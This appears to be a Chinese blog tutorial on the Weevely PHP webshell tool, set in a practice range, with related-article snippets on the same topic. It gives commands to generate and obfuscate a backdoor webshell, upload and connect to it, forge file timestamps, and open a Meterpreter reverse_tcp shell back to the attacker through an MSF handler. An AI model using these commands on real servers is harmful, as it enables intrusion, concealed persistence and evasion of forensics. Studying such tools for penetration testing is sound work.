Linux Shell Weevely

最新推荐文章于 2023-10-24 15:28:07 发布
最新推荐文章于 2023-10-24 15:28:07 发布
阅读量869 收藏 1
点赞数
分类专栏: Web利用 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55313512/article/details/123158127
版权

Weevely

weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。

一、Weevely下载与安装

下载地址:https://github.com/epinna/weevely3

下载之后解压,使用里面的weevely.py

在kali中国

二、WebShell—简介

“web”的含义是显然需要服务器开放web服务

“shell”的含义是取得对服务器某种程度上操作权限

站长:

网站管理、服务器管理、管理数据库等

入侵者:

后门程序、控制服务器、达到目的等

简称:后门,入侵者为了达到目的以及作为控制对方的后门文件

大马小马一句话?

1、小马

文件体积较小、上传文件、文件修改、文件管理

2、大马(不推荐)

文件体积较大、功能齐全、能够提权、操作数据库等 

3、一句话木马(主流)

短小精悍、功能强大、隐蔽性好、客户端直接管理 

三、Weevely—简介

WebShell 管理工具(一句话木马)

Weevely 是一款使用 python 编写的 webshell 工具,集webshell生成和连接于一身,采用c/s模式构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性。

在 linux 上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能。

其他 WebShell 管理工具(扩展)

  • 中国菜刀
  • C刀
  • 中国蚁剑
  • 冰蝎
  • XISE

WebShell管理工具是渗透人员常用的连接工具

四、Weevely—使用

1、生成 shell

命令如下:

weevely generate <password> <文件名>

2、连接 shell

命令如下:

weevely <URL> <password> [cmd] 

3、生成混淆 shell

命令如下:

weevely generate -obfuscator cleartext1_php <password> <文件名> 

五、靶场实战

weevely 生成 webshell 文件名xx.php,密码:xxx来到之前sqlmap的--os-shell命令生成的文件上传目录后我们把生成的xx.php文件上传上去,再使用weevely + url + 密码 连接

六、Weevely—模块

weevely 模块使用

1、信息收集

:system_info 收集系统信息

:system_info - info client_ip 查找自己连接IP

2、文件管理

:file_touch 修改文件时间

:file_touch - human-ts ‘2018-09-15 20:41:20’ 文件名 

3、命令执行

:shell_php 执行PHP命令

:shell_php system(‘ipconfig’);

4、生成 meterpreter 会话

:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 本机IP -port 端口号 

5、MSF 设置

use exploit multi/handler

show payloads

set payload php/meterpreter/reverse_tcp

show options

set lhost 本机IP

run

通过转发我们可以在MSF中操作我们的shell

InfI1traTe.
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux Shell笔记之gawk
hunterno4的专栏
12-22 1万+
gawk:Unix中原始awk程序的GNU版本,强大之处在于可以写脚本来读取文本行的数据,然后处理并显示数据。 命令格式:gawk options program file 一、gawk基础 1.命令行读取程序脚本 # gawk '{print "hello world"}'           //gawk假定脚本是单个文本字符串,须将脚本放到单引号中 hello hello w
Linux shell
大肠干挑面多加蒜的博客
05-27 215
linux shell基础知识 shell是一门弱类型的语言 shell脚本文件通常以.sh结尾 shell脚本的注释符号是# shell脚本的第一行一般是这样的内容 这一行的意义在于声明解释器 系统中的解释器 在/etc/shells这个文件中有系统支持的各种shell [root@CSDN ~]# less /etc/shells /bin/sh /bin/bash /sbin/nologin /bin/dash /bin/tcsh /bin/csh linux
渗透测试Web利器篇之Weevely介绍、安装以及简单使用
lzp_5257的博客
04-20 3248
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 一、Weevely介绍 Weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,采用c/s模式 构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性 在linux上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资 源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能 下载地址:https://github.com/epinna/weevely3.
weevely工具使用
淡巴枯的博客
05-23 6507
weevely工具使用 目录一. 关于weevely二. 安装weevely三. 使用weevely四. weevely实战五. 常用模块六. weevely工作原理 声明:本文禁止转载。 仅作网络安全学习交流,切勿用于任何非法用途,否则后果自负。 一. 关于weevely   weevely是一款基于python编写的webshell管理工具,其优点是跨平台,隐蔽性不错,参数随机生成并加密。但缺点是只支持php。   我们可以在普通的一句话木马上传无效的情况下,使用weevley工具生成的一
【使用过程】weevely生成、上传、连接、执行…你一定行
03-31 6420
weevely傻子都会
Weevely工具使用详解 (Linux菜刀)
weixin_45116657的博客
04-10 2660
一、下载与安装 下载地址:https://github.com/epinna/weevely3 下载之后解压,使用里面的weevely.py 在kali中国 ...
weevely使用小结
weixin_52268949的博客
01-27 496
Weevely 写在前面 由于比赛不确定会不会提供菜刀或者蚁剑,这里我稍微对weevely进行简单介绍一下,具体还是请看官方文档,官方文档讲的很详细(前提你英语嘚不错) 官方文档:https://github.com/epinna/weevely3/wiki/Getting-Started 一般几个步骤就如下 1、在终端输入weevely查看基本使用方法 2、generate一个后门代理(backdoor agent) weevely会给你自动生成,不用自己写。我这里是默认存在/root/agent.ph
Mastering Linux Shell Scripting
最新发布
05-15
《精通Linux Shell脚本编程》是一本深入探讨Linux操作系统中Shell脚本的专著,旨在帮助读者提升在Linux环境中编写高效、实用脚本的能力。Shell脚本是Linux系统中的强大工具,它允许用户通过编写简单或复杂的命令序列...
LinuxShell编程学习
09-09
Linux系统中,虽然有各种各样的图形化接口工具,但是sell仍然是一个非常灵活的工具。Shell不仅仅是命令的收集,而且是一门非常棒的编程语言。您可以通过使用shell使大量的任务自动化,shell特别擅长系统管理任务,...
Linux shell脚本.rar
06-08
文件包含大作业shell脚本(快速备份系统)源码,实验课做的Linux实验shell脚本:Samba实验,DDNS(DHCP服务器 和DNS服务器的配置)的shell脚本,运行脚本每个实验只需要两三分钟即可完成。 其中sy1为实验一脚本,sy2...
webshll提权工具包
12-02
webshll提权工具包 NC PR CMD Churrasco 工具全部已经免杀 无后门 webshll提权利器啊
Weevely中PHP加密模块
01-26
Weevely中PHP加密模块,分离出的
weevely3:武器化的Web外壳
04-05
韦韦利 姓名 Weevely-武器化的Web Shell 用法 weevely generate <password> <path> weevely <URL> <password> [cmd] 描述 Weevely是为后开发目的而设计的Web Shell,可以在运行时通过网络对其进行扩展。 将weevely PHP代理上载到目标Web服务器以获得对它的远程Shell访问。 它具有30多个模块,可协助管理任务,维护访问,提供态势感知,提升特权并传播到目标网络。 阅读“页面以安装weevely及其依赖项。 阅读“页面以生成代理并连接到它。 浏览以阅读示例和用例。 特征 Shell访问目标 以目标为中心SQL控制台 HTTP / HTTPS代理浏览目标 上传和下载文件 生成反向和直接TCP Shell 审核远程目标安全 端口扫描以目标为中心 挂载远程文件系统 以目标为中心的Brute
linux shell学习资料
01-17
在本学习资料包中,包含了三本关于Linux Shell的重要书籍:《Linux Shell编程艺术》、《Linux Shell脚本攻略》以及《Linux Shell从入门到精通》,这些资源将帮助你全面深入地理解和掌握Linux Shell。 《Linux Shell...
Linux shell 脚本 markdown文本编辑
10-28
有关几个shell脚本的编写,如:编写一个shell脚本程序,它带一个命令行参数,这个参数是一个文件。如果这个文件是一个普通文件,则打印文件所有者的名字和最后的修改日期...加入了自己的注释理解
什么是webshell 常见的webshell工具有哪些
Karka_的博客
06-08 1011
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的webshell编写语言为asp、jsp和php。本文将以php Webshell为示例,详细解释Webshell的常用函数、工作方式以及常用隐藏技术。
使用Weevely工具上传一句话木马
weixin_66469999的博客
10-24 592
使用命令weevely generate hello /root/hello.php(hello为密码,/root/hello.php为输出路径)来生成weevely一句话木马。使用命令weevely http://172.16.1.113/hackable/uploads/hello.php hello连接weevely木马。在/root目录下生成一个shell.php文件,文件内容为<?使用:file_upload /root/hello.php backdoor.php上传本地文件到目标服务器上。
网络安全——Webshell管理工具
weixin_54055099的博客
08-21 4432
Webshell的应用,中国菜刀、蚁剑、weevely、御剑、Havij的使用
2021Kali系列 -- linux菜刀(weevely3)
weixin_41489908的博客
04-19 2585
​人这辈子总是再等,等以后,等下次,等不忙,等有条件,等有时间,等有钱了,可是,后来呢。。。 ---- 网易云热评 简介:一款运行在linux系统上的webshell管理工具,可以实现Shell访问目标,以目标为中心的SQL控制台,HTTP / HTTPS代理浏览目标,上传和下载文件,生成反向和直接TCP Shell,审核远程目标安全,端口扫描以目标为中心,挂载远程文件系统,以目标为中心的Bruteforce SQL帐户。 一、下载地址(软件作者) https://github.com/ep..

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值